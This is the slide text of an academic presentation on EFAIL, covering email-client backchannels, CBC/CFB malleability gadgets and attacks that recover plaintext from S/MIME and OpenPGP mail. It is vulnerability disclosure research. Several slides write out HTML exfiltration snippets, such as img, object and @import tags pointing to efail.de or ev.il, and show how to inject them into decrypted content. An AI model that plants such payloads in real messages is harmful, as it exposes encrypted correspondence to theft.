EFAIL: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels 1 Münster University of Applied Sciences Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, 2 Ruhr University Bochum Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2 3 KU Leuven EFAIL • Very important attack • Because it has a logo • Novel attack techniques targeting MIME, S/MIME and OpenPGP CVE-2018-4111 CVE-2018-5185 CVE-2018-4221 CVE-2018-8160 CVE-2018-4227 CVE-2018-8305 CVE-2018-5162 CVE-2018-12372 CVE-2018-5184 CVE-2018-12373 2 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration History of secure email 4 Two competing standards OpenPGP (RFC 4880) • Favored by privacy advocates • Web-of-trust (no authorities) S/MIME (RFC 5751) • Favored by organizations • Multi-root trust-hierarchies 5 Motivation for using end-to-end encryption Nation state attackers • Massive collection of Emails • Snowden’s global surveillance disclosure Breach of email provider • Single point of failure • Aren’t they reading/analyzing my emails anyway? Insecure Transport • TLS might be used – we don’t know! Compromise of email account • Phishing • Bad passwords 6 History of secure email 7 Both standards use old crypto Vulnerable to padding oracle attacks Ciphertext C = Enc(M) C1 valid/invalid C2 valid/invalid … M = Dec(C) (repeated several times) 8 Old crypto has no negative impact CBC / CFB modes of operation used, but their usage is not exploitable Assumption: No backchannel is given 9 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Backchannel techniques Forcing a mail client to phone home • HTML/CSS <img src="http://efail.de"> • JavaScript <object data="ftp://efail.de"> • Email header <style>@import '//efail.de'</style> • Attachment preview ... • Certificate verification 11 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript XSS cheat sheets • Email header • Attachment preview • Certificate verification 12 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript Disposition-Notification-To: [email protected] • Email header Remote-Attachment-URL: http://efail.de X-Image-URL: http://efail.de • Attachment preview … • Certificate verification 13 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview PDF, SVG, VCards, etc. • Certificate verification 14 Backchannel techniques Forcing a mail client to phone home • HTML/CSS • JavaScript • Email header • Attachment preview OCSP, CRL, intermediate certs • Certificate verification 15 Evaluation of backchannels in email clients Outlook Postbox Live Mail The Bat! eM Client W8Mail Windows IBM Notes Foxmail Pegasus Mulberry WLMail W10Mail Thunderbird KMail Claws Linux Evolution Trojitá Mutt Apple Mail macOS Airmail MailMate Backchannels Mail App CanaryMail Outlook iOS found K-9 Mail MailDroid Android R2Mail Nine GMail Yahoo! GMX Mail.ru ProtonMail Mailbox Webmail Outlook.com iCloud HushMail FastMail Mailfence ZoHo Mail Roundcube Horde IMP Exchange GroupWise Webapp RainLoop AfterLogic Mailpile ask user leak by default leak via bypass script execution 16 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Attacker model 18 Attacker model 19 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Hybrid encryption • Choose message 푚 Content-type: app/encrypted • Generate session key 푠 풌푠 • Encrypt message 푚 with session key 푠 • 푐 = 퐴퐸푆푠(푚) Dear Alice, • Encrypt session key 푠 with public key 푝푢푏 of recipient thank you for your email. The meeting tomorrow • 푘 = 푅푆퐴푝푢푏(푠) c • Send the encrypted session key and will be at 9 o‘clock. the encrypted message to the recipient 21 Hybrid encryption • Obtain the encrypted email Content-type: app/encrypted • Extract ciphertext 푘 and ciphertext 푐 풌푠 • Decrypt 푘 with private key 푠푒푐 to obtain session key 푠 Dear Alice, • 푠 = 푅푆퐴푠푒푐(푘) • Decrypt ciphertext 푐 with session key 푠 thank you for your email. to obtain the cleartext 푚 The meetingctomorrow • 푚 = 퐴퐸푆푠 푐 will be at 9 o‘clock. 22 Malleability of CBC/CFB 푠 풄 ↯ 23 Malleability of CBC/CFB 푠 Dear Alice, ????????????????↯ur efail. The meeting풄tomorrow will be at 9 o‘clock. 24 Hybrid malleability of CBC/CFG Message Authentication Codes (MAC) • Protection against ciphertext tampering • Attacks against MAC-then-Encrypt (Vaudenay) • Attacks against MAC-and-Encrypt (Paterson) 25 S/MIME: Absence of authenticated encryption S/MIME Structure 26 Malleability of CBC/CFB C0 C1 C2 decryption decryption Content-type: te xt/html\nDear Bob P0 P1 27 Malleability of CBC/CFB C0' C1 C2 decryption decryption XOR A B Q 0 0 0 Zontent-type: te xt/html\nDear Bob 0 1 1 P0' P1 1 0 1 1 1 0 28 Malleability of CBC/CFB C0 ⊕ P0 C1 C2 decryption decryption 0000000000000000 xt/html\nDear Bob P0' P1 CBC Gadget 09.08.2018 29 Malleability of CBC/CFB C0 ⊕ P0 ⊕ Pc C1 C2 decryption decryption XOR A B Q 0 0 0 <img src=”ev.il/ xt/html\nDear Bob 0 1 1 P0' P1 1 0 1 1 1 0 30 Malleability of CBC/CFB C0 C1' C2 decryption decryption Content-type: te Zt/html\nDear Bob P0' P1' 31 Malleability of CBC/CFB C0 C1' C2 decryption decryption ???????????????? Zt/html\nDear Bob P0' P1' 32 Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration Practical Attack against S/MIME 34 Practical Attack against S/MIME Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi Original Crafted ???????????????? <base " ???????????????? " href="http:"> ???????????????? <img " ???????????????? " src="efail.de/ Content-type: te xt/html\nDear Sir or Madam, the se ecret meeting wi ???????????????? "> Changing Duplicating Reordering 35 Practical Attack against S/MIME Overview 1. Introduction 2. Backchannels 3. Attacker Model 4. Malleability Gadgets 5. Attacking S/MIME 6. Attacking OpenPGP 7. Direct Exfiltration OpenPGP • OpenPGP uses a variation of CFB-Mode • PGP-Standard has integrity protection • Compression is enabled by default Ci Ci+1 Ci X encryption encryption encryption encryption ? ? ? ? ? ? ? ? random plaintext Pi (known) Pi-1 Pc (chosen) 38 OpenPGP – Integrity Protection • Integrity Protection is performed by adding an MDC at the end of the packet TAG 18 LENGTH <encrypted> TAG 8 LENGTH Tag Type of PGP packet <compressed> TAG 11 LENGTH 8 CD: Compressed Data Packet Content-Type:multipart/mixed; boundary=“ 9 SE: Symmetrically Encrypted Packet … … 11 LD: Literal Data Packet 18 SEIP: Symmetrically Encrypted and Integrity TAG 19 LENGTH Protected Packet efa3e9ca54f0879c5b187636c23b7de376a5ba41 19 MDC: Modification Detection Code Packet 39 RFC4880 on Modification Detection Codes OpenPGP – Integrity Protection Defeating Integrity Protection Client Plugin (up to version) MDC Stripped MDC Incorrect SEIP -> SE Outlook 2007 GPG4WIN 3.0.0 Outlook 2010 GPG4WIN Outlook 2013 GPG4WIN Outlook 2016 GPG4WIN Thunderbird Enigmail 1.9.9 Apple Mail (OSX) GPGTools 2018.01 Vulnerable Not Vulnerable 41 OpenPGP – Compression • PGP uses compression (DEFLATE) Content-Type: multipart/mixed; boundary=„BOUNDARY" --BOUNDARY • Makes our life much harder: we do not know so many plaintext bytes <GUESS_1> --BOUNDARY • We need to know at least 11 Bytes of the plaintext but only know 4 from the packet ... headers --BOUNDARY <GUESS_N> • But: We can do multiple guesses per Mail --BOUNDARY-- • Mostly between 500 to 1,000 „submails“ per mail 42 OpenPGP – Compression 43 OpenPGP – Compression Content-Type: multipart/alternative; boundary="b1_232f841e30b3b8112f31ed86c8cee5ab" --b1_232f841e30b3b8112f31ed86c8cee5ab Content-Type: text/html; charset="UTF-8" <html> <body> <p>Hello XXX,</p> <p>here is your code: 123456</p> <img src="https://www.facebook.com/email_open_log_pic.php?mid=TRACKING_CODE_HERE"/> </body> </html> --b1_232f841e30b3b8112f31ed86c8cee5ab-- 44 OpenPGP – Compression Facebook Password Recovery Content-Type: • Generated 100,000 Password Recovery Emails based on template multipart/mixed; boundary=„BOUNDARY" • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes --BOUNDARY A302789ced590b90... No. Starts with … % Cumulated % --BOUNDARY 1 a302789ced590b9014c519 30.95 30.95 A302789ced590d90... 2 a302789ced590d9014c515 7.99 38.94 --BOUNDARY 3 a302789ced59099014d519 7.80 46.73 A302789ced590990... … 211 a302789ced59098c14551a 0.001 100 --BOUNDARY-- 45 OpenPGP – Compression Enron Email Dataset • Contains approx. 500,000 „real“ Emails1 • Encrypted them with GnuPG in default configuration • Estimated number of guesses based on variance in starting bytes No. Starts with … % Cumulated % 1 a302789c8d8f4b4ec3400c 6.61 6.61 2 a302789ced90c16e133110 2.21 8.82 3 a302789c7590b14ec33010 0.66 9.48 … 500 a302789c4d90cb8ed34010 0.03 40.99 1 https://www.cs.cmu.edu/~enron/ 46 47 Impact on the standards S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11 • References EFAIL paper • Recommends the usage of authenticated encryption with AES-GCM OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05 • Deprecates Symmetrically Encrypted (SE) data packets • Proposes AEAD protected data packets • Implementations should not allow users to access erroneous data 48 Overview 1. Introduction